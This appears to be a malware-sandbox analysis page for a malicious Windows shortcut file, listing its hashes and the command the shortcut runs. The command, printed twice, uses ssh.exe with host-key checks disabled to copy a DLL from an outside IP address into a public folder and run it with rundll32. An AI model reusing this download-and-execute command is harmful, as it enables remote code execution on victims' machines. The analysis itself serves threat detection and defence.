General
Structural Analysis
Config.0
Yara Rules0
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 16d624196abdd850fe4b92894970605c
|
| Sha1 | 8a0366ae8a374a3c2571078124ce6f36d2d4da09
|
| Sha256 | 9714272c145f2756b257ebe574a7d84f1ae476897ed42cae28d31ee4f4354dae
|
| Sha384 | a92a60a799db08c13522a768da26b8f3eab539388bfec3cea9f8289eeba943b88080a46438548d6e2a4bf116d1f268b1
|
| Sha512 | ded3f419eb181c006cfe0588bafaceaba3c9705393026264ed5191ede6e2bfae1945987ba5756e6a1ec5223ba9811e56f7c7d8c05964b0a3bab9ddb250230b6f
|
| SSDeep | 48:8tmXZDbbWG9/GzWyvHnLWIIlgwV5WSo5UBWW7/G7:8U9h9eBfniP5W9UBWAe
|
| TLSH | 4931310677E91329D2B38E7984BBD2108929BC02EC525F3D0584079C1860719FD36F3F
|
File Structure
16d624196abdd850fe4b92894970605c
Malicious
[Lnk Summary]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | ssh.exe -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp helpdesk@18.227.111.207:/tmp/msvcrp.dll c:\users\public\. && rundll32.exe c:\users\public\msvcrp.dll,patch" helpdesk@18.227.111.207 |
16d624196abdd850fe4b92894970605c (1.86 KB)
File Structure
16d624196abdd850fe4b92894970605c
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | ssh.exe -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp helpdesk@18.227.111.207:/tmp/msvcrp.dll c:\users\public\. && rundll32.exe c:\users\public\msvcrp.dll,patch" helpdesk@18.227.111.207 Malicious |
16d624196abdd850fe4b92894970605c |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.